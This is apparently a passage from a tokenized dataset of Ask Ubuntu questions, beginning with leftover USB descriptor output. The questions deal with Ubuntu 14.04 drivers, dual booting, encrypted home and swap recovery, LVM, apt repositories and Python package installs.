input_terminal ) bterminalid 7 wterminaltype 0x0201 microphone bassocterminal 0 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 13 bdescriptortype 36 bdescriptorsubtype 4 ( mixer_unit ) bunitid 9 bnrinpins 2 basourceid ( 0 ) 2 basourceid ( 1 ) 12 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 bmcontrols 0x00 imixer 0 audiocontrol interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 5 ( selector_unit ) bunitid 10 bnrinpins 1 basource ( 0 ) 6 iselector 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 11 bsourceid 7 bcontrolsize 1 bmacontrols ( 0 ) 0x03 mute control volume control bmacontrols ( 1 ) 0x00 bmacontrols ( 2 ) 0x00 ifeature 0 audiocontrol interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 5 ( selector_unit ) bunitid 12 bnrinpins 1 basource ( 0 ) 11 iselector 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 1 bnumendpoints 2 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 2 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 11 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 2 bsubframesize 2 bbitresolution 16 bsamfreqtype 1 discrete tsamfreq [ 0 ] 44100 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x00c8 1x 200 bytes binterval 1 brefresh 0 bsynchaddress 131 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x00 blockdelayunits 0 undefined wlockdelay 0 undefined endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0003 1x 3 bytes binterval 1 brefresh 5 bsynchaddress 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 1 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 3 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 11 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 2 bsubframesize 2 bbitresolution 16 bsamfreqtype 1 discrete tsamfreq [ 0 ] 44100 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x00c8 1x 200 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x00 blockdelayunits 0 undefined wlockdelay 0 undefined interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 3 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.00 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 131 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 10 device status : 0x0000 ( bus powered )
485580	centralized managment of some computers	we have three computers with ubuntu connected to a lan network . each computer has the software each user installs , and updates are done when the users want to update . these computers share among them a hard disk of several tb . we would like our computers to have the same software , and to be updated all at the same time . moreover , we would like each user to know the available resources that there are in each computer . this way they might launch a process in a computer or in another depending on the available resources . do you know a way to do it ? what do you recommend ? thanks a lot .
485582	nvidia drivers question	i have a question about drivers , should i use the ones , provided by ubuntu ( 14.04 - 331.38 ) , or should i install the latest ones from nvidia ( 331.79 ) ? which would work better ? nvidia page says this : note that many linux distributions provide their own packages of the nvidia linux graphics driver in the distribution 's native package management format . this may interact better with the rest of your distribution 's framework , and you may want to use this rather than nvidia 's official package . so , i 'm kind of scared to try that since i had bad experience with installing the latest amd radeon drivers before . i know , it 's not the same but still ... and if i should choose 331.38 which one of that ? 331.38 - updates what difference is between this and 331.38 thanks !
485584	doubs and problems with dual boot with windows 8.1	i 'm new to ubuntu and i need some help because i need it to work . 1 ) i got a dell inspiron 15r se ( or 7520 ) . it got a ssd along with 1t disk . i 'm not sure , but when i leave some space from c disk to install ubuntu ( does n't matter if its formatted or only free space ) , the ubuntu installer from bootable usb wo n't show this free space only the ssd . anyone know why ? 2 ) i got a external 1t disk that i use for backup . if i install ubuntu on this disk and uses it booting ubuntu from usb whenever i need it , does it uses all my available hardware ? because that seems a good solution . will i be able to access my windows files from that bootable ubuntu usb stick ? thanks
485585	cacti does n't show graphs	i have been with some problems on configuration of cacti . my goal is monitoring another pc remotely . after all the configuration and with snmp fully functional , the graphs appear with axis only . do you have some solutions ?
485587	where do i find ubuntu 's pgp signatures and signing keys ?	where can i find pgp signatures and signing keys for ubuntu ? i want to verify the download , but the only thing i can find are the md5 hashes ( https : //help.ubuntu.com/community/ubuntuhashes ) . i ca n't imagine that ubuntu does n't offer a way to check the integrity of an iso image .
485592	ubuntu gnome 14.04 classic desktop missing	i had recently been running ubuntu gnome 13.10 with the classic desktop enabled . at the login menu , it would show a few options : system default gnome gnome classic gnome flashback ( metacity ) gnome flashback ( compiz ) i would select gnome classic to login . it would show an interface like the following post : http : //www.linuxbsdos.com/2013/07/08/gnome-3-classic-is-more-of-a-hybrid-desktop/ the main features were the applications / places menu . when you would hit the super button it would bring up the dash ( as well as moving the mouse to the upper right hand corner ) . the menu would show a favorites and at the bottom it would show activites . at the bottom of the screen , the task pane was present . i 've now upgraded to ubuntu gnome 14.04 . i have the gnome flashback metacity/compiz , but i do not have the gnome classic . i was really happy with this hybrid interface . does anyone know how i can bring it back ?
485601	error when i try to print a document on my machine	each time when i print a file , when i have chosed a printer on my desktop , the file closed automatically . my os is ubuntu 14.04 . anyone else has the same problem ?
485607	getting festival to talk at start up ubuntu 14.04	using this script : week= $ ( date +” % a” ) day= $ ( date +” % e” ) echo hello $ user you are super awesome i am your processor | festival –tts echo today is $ week $ day | festival –tts echo have a nice day | festival –tts but it is not working thank you for any help .
485612	is there a way to force lid state to open	my lenovo x1 carbon laptop with ubuntu 14.04 has a problem where the screen and keyboard stopped working . it does work if i use an external monitor and keyboard . i think the reason for this is that my laptop always thinks the lid is closed , even when it 's not . i can see this when i look in the /proc/acpi/button/lid/*/state file . since i do n't know how to fix my laptop , does anyone know of a way to force the lid state to open .
485615	how do i mask hardware detection on steam ran w/ wine ? ubuntu 14.04 trusty	how do i mask hardware detection on steam ran w/ wine ? i 'm running steam through wine and trying to run csgo but i get an error for no csm support because i use an ati graphics card 7800 series . i 've read about similar problems people were having and their solution was to mask the graphics card info by editing steam prefixed wine registry and altering videopcivendorid and videopcidevice ids . i 've tried this but the system information on steam has n't changed , and i continue to get this error . so clearly i 'm doing something wrong . is there a way to stop steam from detecting this info at all ? wine is 1.7.2 btw . this is a result from a sudo apt-get update : err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found ign http : //us.archive.ubuntu.com trusty/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty/universe translation-en_us err http : //ppa.launchpad.net trusty/main i386 packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
485617	how do i enable password request after hibernation in lubuntu 14.04 ?	i 'm running lubuntu 14.04 and have finally managed to enable hibernation . however , after hibernation , the system will start without asking for my password . i 've tried several advices posted for older versions of ubuntu , but none were successful .
485619	apt server certificate verification with a valid certificate	i 'm attempting to make a private apt repo . its going to be served over https and its located at https : //repo.signalvine.com . it is also going to be using basic auth , which i setup as deb https : //username : password @ repo.signalvine.com/ dev non-free as indicated here . when i attempt to update the apt cache i get : err https : //repo.signalvine.com dev/non-free amd64 packages server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none when i connect using curl ( curl https : //repo.signalvine.com ) from the same machine , curl states that ssl certificate verify ok . i 've also tested repo.signalvine.com using qualys ssl labs and it does n't find any problems . what do i need to do in order for apt to validate my certificate ?
485620	ubuntu server internal specifications	i 'm doing a homework assignment for my college , and i 'm trying to find the parameters used in kernel compilation on redhat . my teacher asks : `` analyse and describes in terms of models of each version of linux for servers : process , scheduling , memory management , file system , security '' i searched in all the internet , someone will say that every kernel is the same , but have some parameters that each distro can modifie and change the hole thing , is what i 'm searching for . can someone answer me where can i find these informations ?
485621	suddenly stopped showing my wifi in ubuntu 14.04 in the list in dell inspiron 5420 ?	suddenly stopped showing my wifi in ubuntu 14.04 in the list in dell inspiron 5420 , googled a lot , could not go through a working solution.any ubuntu user faced the same , please help me ? http : //askubuntu.com/ ... /only-my-wifi-is-not-working ... this thread have the similar problem but it is not working . earlier it was working as perfect , do n't know what happened !
485625	ubuntu username / home directory changed - now files & settings are gone	================================== update - 6/20 # tangodown i went ahead and executed 'cp -rfp /home/old /home/new' now , i have some additional hidden folders in '/home/new ' , and it also has a new unhidden folder '/home/new/old ' . now i have correct looking symlinks ... 'access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop ' '.ecryptfs - > /home/.ecryptfs/old/.ecryptfs ' '.private - > /home/.ecryptfs/old/.private ' 'readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt ' here is where i am today ( 6/20 ) : computer boots up in from liveusb , and i can successfully find and recover the ecrypt home folder by using 'ecryptfs-recover-private ' . computer does not bootup without liveusb , and instead of a login screen i get a blank screen with popup warning of graphic configuration issues , which lets me try to boot in low graphics mode , configure graphics , or look at system errors . this is new , since i last ran the ecryptfs-recover-private and it maxed out my hard drive , which i then had to delete data from ( including removing root trash and cache . before i run ecryptfs-recover-private , i only have 33 % free space while the recovery drive is still encrypted ... and after i run ecryptfs-recover-private and start copying it over to the drive mounted at /media/ubuntu/123xyz , i get to 100 % and the computer messages ( fail ) that i 'm out of space . it seems fine when it is mounted as read-only at /tmp/ecryptfs.123xyz , but when i start copying files , it runs our of space . even if i do it incrementally , it seems the os is not booting properly . now , i seem to have enough space to work on from liveusb , but it is acting slow and funky . here is output from root @ ubuntu : /my_folder # df -h : **filesystem size used avail use % mounted on** /cow 976m 150m 776m 17 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 303m 1.1m 301m 1 % /run /dev/sdb1 3.8g 2.0g 1.9g 52 % /cdrom none 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs 1.5g 1.1m 1.5g 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 1.5g 80k 1.5g 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/mapper/ubuntu-root 73g 46g 24g 67 % /media/ubuntu/123xyz with the new files coming to the drive at roughly 30+gbs , and the original /media/ubuntu/123xyz/.ecryptfs backup file weighing in at at 29gbs , i easily outgrow my 79gbs worth of available space . i tried using my external drive ( ugh , the stupid wd passport ) , which is locked and encrypted and needs a mac to unlock ( not available right now ) , i am dealing with how to get my drive back to where it was ... 40 % or so left of free space and all recovered . thank you . origin i am not a novice , but clearly not learned enough to fix this damaging issue i just created , so thanks in advance for your help ... this is a recent , customized infosec/dev ubuntu 14.04 lts laptop , running sweet until the below happened . i followed these instructions to a tee in order to change my old username into a new one : http : //www.cyberciti.biz/faq/howto-change-rename-user-name-id i also continued with specific home directory intsructions found here : http : //jesin.tk/change-home-directory-in-linux/ ) ... now my username , group and home folder are all changed and permissions/ownership correct , as well as new user has been set to new home . i even ran the cp -f /home/username/* /home/new_home_dir/ to copy over all home files to new folder . however , this did n't work so well in my favor ... problem i can login , i can access files in home , but all of my desktop , settings and home files are gone . back to square 1 , with only 1 clue in my new home folder : two files by the name of readme and access-your-private-data.desktop . problem key : old username : old new username : new new group : newg1 my user id info : uid=1000 ( new ) gid=1000 ( newg1 ) groups=1000 ( newg1 ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,107 ( lpadmin ) ,124 ( sambashare ) uid 1000 has not changed even though the username changed . old was the user 1000 , as was old the home directory name . i changed the username to new , same uid ( 1000 ) , and changed old group name to newg1 . i did all of this from command line , by hitting ctrl+alt+f1 from the login screen , then logging into a secondary account ( not the old or the new account ) . original issue : now , i can login all day long . however , my old account , which has been changed to new , looks like a brand new user account , and all of my data and files and configuration are gone when logged in using the new account . however , in the /home/new folder , i have these files : access-your-private-data.desktop readme.txt but no files such as : .ecryptfs .private ... etc when trying to open access-your-private-data.desktop , terminal opens and closes instantly . so nothing happens . and when executing ecryptfs-mount-private i get the following ; $ ecryptfs-mount-private error : encrypted private directory is not setup properly questions ( solved - see below ) : ( solved - see update below ) how do i access the encrypted files and move , delete or alter them ? ( solved - see update below ) where did all of my home files and config from old user go , if all ( solved - see update below ) i did was change the username and group name , as well as home folder name ( and even assign user to folder ) , and copy everything ? ( solved - see update below ) if it 's not encrypted , where did it all go ? can i keep going and get it fixed with new everything ? or , can i backtrack properly to old everything ? i looked in /tmp but nothing like 'ecryptfs.123xyz ' is in there except ssh-123xyz and hsperfdata_new . this guys made it look easy on what to do with the file : hgoshawknest.wordpress.com/2010/04/16/how-to-recover-crypted-home-directory-in-ubuntu/ but again , this is not working for me . steps i took : i am setting up a boot usb with ubuntu 14 , in hopes to follow directions on mounting properly ( as in described here : ubuntuforums.org/showthread.php ? t=1810825 ) , but i am not sure i am working correctly . thanks in advance . this is amazingly important to recover my old setup , regardless of username and home folder name . please help with this if you can . all the best ! ps - here is a list of references that helped me screw up ( i mean execute ) the above : resources : www.hgoshawknest.wordpress.com/2010/04/16/how-to-recover-crypted-home-directory-in-ubuntu/ www.cyberciti.biz/faq/howto-change-rename-user-name-id/ www.jesin.tk/change-home-directory-in-linux/ www.ubuntututorials.com/change-username-ubuntu-12-04/ www.ubuntuforums.org/showthread.php ? t=2103420 www.askubuntu.com/questions/34074/how-do-i-change-my-username www.bodhizazen.net/tutorials/ecryptfs # live www.bugs.launchpad.net/ubuntu/+source/ecryptfs-utils/+bug/1028532 www.askubuntu.com/questions/190404/changed-username-now-i- can not -log-on-or-view-my-previous-files www.manpages.ubuntu.com/manpages/jaunty/man8/usermod.8.html
485630	stuck at saving installed packages	first of all i am beginner . i am stuck upgrading from ubuntu 12.04 to 14.04 . to be honest i was not able to install properly the version 12.04 too . now the part where i am stuck is when it 's saving installing packages . it downloads for half hour . i 'm also getting some other problems : sometimes i am not able connect to my wireless router meanwhile i use the live disk and at the same time i 'm not able to choose the options to upgrade to 14.04 until i connect to wireless router ! i am installing from pen drive . .
485633	how do i distinguish folders with the same name in unity ?	in unity , the meta key brings up a quick search bar . handy . but if i have multiple directories or files with the same name ( say ... readme ) there does n't appear to be any way to distinguish them : hovering over the folder icon does n't expose anything . selecting one icon exposes the directory ( or file ) size and modification date . i can open , reveal or email it , but i still do n't know which directory the file is in . is there any way to expose that information ?
485637	how to be sure , that i am running latest version of a kernel ?	i 've installed xubuntu after ubuntu , running in dualboot . so xubuntu controls the grub . every time i update kernel on ubuntu - will ubuntu load the latest version of a kernel ? ( i mean the grub is not updated , it may be updated by xubuntu . and i do n't want to write the grub to mbr from ubuntu ) i ca n't find information which is latest kernel version for trusty , but mine is 3.13.0-24-generic
485638	ati driver with hd7470m laptop screen backlight not working	i need to install the ati proprietary driver on my laptop ( asus k54hr ) as i use it for gaming . my problem is , it does n't matter what i try , i have always the same result black screen and i have to reinstall ubuntu . it works fine with external monitors but not with the laptop screen . i use ubuntu 14.04 in dual boot with windows 7 both 64bit . i tested it with 12.04 64 bit too . my graphic card is radeon hd 7470m seymour series . what can i do ? thank you .
485642	can not install lxml in virtualenv ( python )	i can not install lxml . in system i have python-lxml package , but i need other ... please help , if you can - my task is install lxml for development in virtual enviroment using virtualenv . i found this solution repaired successfully installation lxml : $ sudo apt-get install libxml2 libxml2-dev libxslt-dev build-essential python-dev $ sudo ldconfig then : $ source bin/activate # for activate enviroment ( env ) $ pip install lxml but i have many problems . first problem was install build-essential with dependencies - why build-essential failed ? it solved ! thanks for it ! next i have this one ( output ) : ( env ) $ pip install lxml ... i686-linux-gnu-gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -d_fortify_source=2 -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security build/temp.linux-i686-2.7/src/lxml/lxml.etree.o -lxslt -lexslt -lxml2 -lz -lm -o build/lib.linux-i686-2.7/lxml/etree.so /usr/bin/ld : can not find -lz collect2 : error : ld returned 1 exit status error : command 'i686-linux-gnu-gcc ' failed with exit status 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command /tmp/1/bin/python -c `` import setuptools , tokenize ; __file__='/tmp/1/build/lxml/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-dpyhby-record/install-record.txt -- single-version-externally-managed -- compile -- install-headers /tmp/1/include/site/python2.7 failed with error code 1 in /tmp/1/build/lxml storing debug log for failure in /home/constantia/.pip/pip.log i read this instruction http : //lxml.de/installation.html and try : static_deps=true pip install lxml i try : ( env ) $ static_deps=true pip install lxml ... file `` buildlibxml.py '' , line 268 , in call_subprocess raise exception ( 'command `` % s '' returned code % s ' % ( cmd_desc , returncode ) ) exception : command `` make -j3 '' returned code 512 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command python setup.py egg_info failed with error code 1 in /tmp/1/build/lxml traceback ( most recent call last ) : file `` /tmp/1/bin/pip '' , line 11 , in < module > sys.exit ( main ( ) ) file `` /tmp/1/local/lib/python2.7/site-packages/pip/__init__.py '' , line 185 , in main return command.main ( cmd_args ) file `` /tmp/1/local/lib/python2.7/site-packages/pip/basecommand.py '' , line 161 , in main text = '\n'.join ( complete_log ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xd0 in position 13 : ordinal not in range ( 128 ) i understand that reason may be lang variables and try this : $ unset lang i have after ( output ) : ( env ) $ static_deps=true pip install lxml ... file `` buildlibxml.py '' , line 268 , in call_subprocess raise exception ( 'command `` % s '' returned code % s ' % ( cmd_desc , returncode ) ) exception : command `` make -j3 '' returned code 512 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command python setup.py egg_info failed with error code 1 in /tmp/1/build/lxml storing debug log for failure in /home/constantia/.pip/pip.log so , i try to use easy_install with static_deps=true i have after ( output ) : ( env ) $ static_deps=true pip install lxml ... make [ 2 ] : *** [ progname.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 2 ] : leaving directory `/tmp/easy_install-bqh5ag/lxml-3.3.5/build/tmp/libiconv-1.14/srclib' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/tmp/easy_install-bqh5ag/lxml-3.3.5/build/tmp/libiconv-1.14/srclib' make : *** [ all ] error 2 traceback ( most recent call last ) : file `` /tmp/1/bin/easy_install '' , line 11 , in < module > sys.exit ( main ( ) ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1909 , in main with_ei_usage ( lambda : file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1896 , in with_ei_usage return f ( ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1913 , in < lambda > distclass=distributionwithouthelpcommands , **kw file `` /usr/lib/python2.7/distutils/core.py '' , line 151 , in setup dist.run_commands ( ) file `` /usr/lib/python2.7/distutils/dist.py '' , line 953 , in run_commands self.run_command ( cmd ) file `` /usr/lib/python2.7/distutils/dist.py '' , line 972 , in run_command cmd_obj.run ( ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 358 , in run self.easy_install ( spec , not self.no_deps ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 593 , in easy_install return self.install_item ( spec , dist.location , tmpdir , deps ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 623 , in install_item dists = self.install_eggs ( spec , download , tmpdir ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 809 , in install_eggs return self.build_and_install ( setup_script , setup_base ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1015 , in build_and_install self.run_setup ( setup_script , setup_base , args ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1000 , in run_setup run_setup ( setup_script , args ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/sandbox.py '' , line 50 , in run_setup lambda : execfile ( file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/sandbox.py '' , line 100 , in run return func ( ) file `` /tmp/1/local/lib/python2.7/site-packages/setuptools/sandbox.py '' , line 52 , in < lambda > { '__file__ ' : setup_script , '__name__ ' : '__main__ ' } file `` setup.py '' , line 229 , in < module > file `` setup.py '' , line 140 , in setup_extra_options file `` /tmp/easy_install-bqh5ag/lxml-3.3.5/setupinfo.py '' , line 57 , in ext_modules file `` /tmp/easy_install-bqh5ag/lxml-3.3.5/buildlibxml.py '' , line 348 , in build_libxml2xslt file `` /tmp/easy_install-bqh5ag/lxml-3.3.5/buildlibxml.py '' , line 285 , in cmmi file `` /tmp/easy_install-bqh5ag/lxml-3.3.5/buildlibxml.py '' , line 268 , in call_subprocess exception : command `` make -j3 '' returned code 512 so i sad and do n't know what to do . i believe for help from stack exchange community . sorry for my question and english ( it 's not my native language ) .
485646	how do i configure smuxi-server to run as a normal service ?	i installed the smuxi-engine package on my ubuntu 14.04 server which contains the smuxi-server binary . but i do not see instructions anywhere on configuring it to run as a service . is there a way to do this ?
485649	fglrx does n't seem to be installed	hello everybody , here 's my problem . i 'm trying to install fglrx to my ubuntu 14.04 , i 've tried following this , the problem is after the installation of the .deb file , when i 'm supposed to use this commandsudo amdconfig -- initial -f it says that the command was n't found ( happens the same to fglrxinfo ) ; so i tried follow the `` amdconfig not found after installation '' on the same link mentioned above , but when i use sudo update-alternatives -- set gl_conf /usr/lib/fglrx/ld.so.conf it says `` error : no alternatives for gl_conf '' . i 've tried everything i can , my computer is a hp g62-b10sp , it has both intel and amd graphic board . i 'm new to ubuntu and i 'm trying to play 3d games with it ; i 'm not sure if it is really better to have fglrx or the open source drive , so , i want to know if it is better to have fglrx and , if it is , how to fix my problem . thanks for everything in advance . ps . i do n't know if i 'm suppose to have it , but it seems like i do n't have the xorg.conf file .
485650	tor related question	so i dont want to install the tor browser bundle on my computer , i just want to execute ( open ) it from the .sh file that is provided when you download the tbb from the tor site . but for some odd reason when i click open the .sh file will not open . all other shell scripts that i have executed have opened successfully , all but this tor one . can some plz tell me what i can do . i know you can install it via ppa , but like i mentioned i dont want to install it . i have already set all .sh files to `` run executable text files when they are opened '' in my nautilus preferences . i just upgraded to 14.04 a few nights ago . thanks in advance .
485656	ubuntu partition problems	i was trying to install a new operating system today , and i have tried before , but ever since the 14.04 release of ubuntu , i have not been able to install any more os . so , i tried formatting the ubuntu os partition into an unknown file type for it , so it would just go past the grub screen , and allow to me install this os . however , once i did this and rebooted , this is what i found : error : unknown filesystem . entering rescue mode ... grubrescue > now , before anyone says anything , i do n't have a windows repair disc , because my computer came with windows on it . 2nd , i do n't have a ubuntu live cd . i got ubuntu approximately a year ago , and have since lost the location of the disc . this is being written from my phone , thanks for reading . hope somebody can help me . : )
485657	do n't understand following error : 'mkdir : invalid option -- '/ '	i 'm following a tutorial in a book and i 'm tryin to install oracle jdk 8 . i 've opened a terminal and entered the following command after the dollar prompt : sudo mkdir -p/usr/lib/jvm/ however , it 's throwing me the following error : mkdir : invalid option -- '/' what am i doing wrong ?
485661	swap not availlable	i have noticed that my swap is not available . this could explain why my computer freezes every so often when i am using it heavily . i installed 14.04 64-bit with an encrypted folder , which automatically encrypts my swap . this used to work perfectly in 12.04 64-bit . the relevant lines from /etc/fstab are : # swap was on /dev/sda6 during installation # uuid=5e37c9cd-ba35-4907-8c77-556a308d1491 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 sudo blkid does not list the swap : /dev/sda1 : label= '' pqservice '' uuid= '' fa3a29383a28f375 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' 967cf34f7cf3291f '' type= '' ntfs '' /dev/sda3 : label= '' daisy pc '' uuid= '' 36027b05027ac97f '' type= '' ntfs '' /dev/sda5 : label= '' daisyhome '' uuid= '' 4ad946a8-3a8e-41b9-907c-258b2ad9544e '' type= '' ext4 '' /dev/sda7 : label= '' daisyroot '' uuid= '' 5cb3c1ff-fdd2-458b-9765-b9407d19b469 '' type= '' ext4 '' system monitor shows swap as being unavailable . gparted shows the swap partition as `` unknown '' . disks shows the swap partition as `` linux swap '' , but is unable to mount the partition . i have been googling , reading ubuntu forums and searching this forum , and have been unable to find anything that helps to re-enable the swap . can you help , please . edit the file /etc/crypttab confusingly has two lines : cryptswap1 uuid=5e37c9cd-ba35-4907-8c77-556a308d1491 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 cryptswap1 uuid=7426472f-9ec1-4e53-b8e1-930e3d6f73fc /dev/urandom swap , cipher=aes-cbc-essiv : sha256 here is a list of the uuids on my system : $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 jun 20 08:48 36027b05027ac97f - > ../../sda3 lrwxrwxrwx 1 root root 10 jun 20 08:48 4ad946a8-3a8e-41b9-907c-258b2ad9544e - > ../../sda5 lrwxrwxrwx 1 root root 10 jun 20 08:48 5cb3c1ff-fdd2-458b-9765-b9407d19b469 - > ../../sda7 lrwxrwxrwx 1 root root 10 jun 20 08:48 967cf34f7cf3291f - > ../../sda2 lrwxrwxrwx 1 root root 10 jun 20 08:48 fa3a29383a28f375 - > ../../sda1 now my problem is : how do i determine the uuid of /dev/sda6 ? is this even possible on an encrypted swap ? finally , how do i fix /etc/crypttab ?
485663	how can i add a new drive to an existent logical volume ?	i have a personal remote server running ubuntu desktop 14.04 with no graphical access . i have lvm set up with the internal hard drive ( /dev/sda ) , and i 've plugged in a new usb hard drive ( /dev/sdb ) . i want to add sdb to the vg and lv that i already have so i can use them as one volume . how can i do that ? i see lots of guides talking about how to create vgs and lvs , but i do n't want to create another , i want to add a pv to an existing vg and lv . root @ hostname : / # pvdisplay -- - physical volume -- - pv name /dev/sda1 vg name discus pv size 149.05 gib / not usable 2.00 mib allocatable yes ( but full ) pe size 4.00 mib total pe 38156 free pe 0 allocated pe 38156 pv uuid lapqyk-ikju-w7rz-amw1-7kee-xgpv-2yin93 '' /dev/sdb1 '' is a new physical volume of `` 111.79 gib '' -- - new physical volume -- - pv name /dev/sdb1 vg name pv size 111.79 gib allocatable no pe size 0 total pe 0 free pe 0 allocated pe 0 pv uuid 3bcube-9rxt-aaj8-gxgn-jhdd-ptmu-dlpqea
485666	downloaded drivers for my canon scanner but now what ?	i have a canon mp180 printer/scanner and the printer works fine with 12.04 lts . but my scanner is not detected . i followed the instructions on sane - installing a scanner that is n't auto-detected but without any success . i also found the canon drivers for linux ( mp190_debian_drivers.tar ) and downloaded them but being an wp xp user , i am confused as to what to do with the downloaded files , besides uncompressing them . do i need to run them somehow , or save them ?
485669	treat touch screen separate from mose	in ubuntu 14.04 it treats the touch screen separate from the mouse , similar to windows 8 . i am using 12.04 for several reasons , and i wish to partially upgrade my system to handle the touch screen as described . i have an asus q500a , with a win8 ubuntu dual boot . i was thinking if i just download the kernel used by 14.04 and upgrade xorg it may accomplish this , but i want to get another opinion .
485671	why ca n't libre version : 4.2.5.2 build id : 420m0 ( build:2 ) print in ubuntu 14.04 ?	why ca n't libre version : 4.2.5.2 build id : 420m0 ( build:2 ) print in ubuntu 14.04lts intelâž pentium ( r ) cpu b960 @ 2.20ghz ă 2 ? i can print from everything else , i removed and reinstalled libre upgrade but still same result . libre reports `` could not start printer.please check your printer configuration. '' . i updated everything but i have seen reference to this problem : https : //bugs.freedesktop.org/show_bug.cgi ? id=77776 but no solution ? ?
485673	mount dvd player	i just wanted to dvd player to view video and pictures on dvd and realized that i need mount the device to use it . i want to learn the procedures to mount the device and to use it . your help and information is great appreciated , regards , iccsi ,
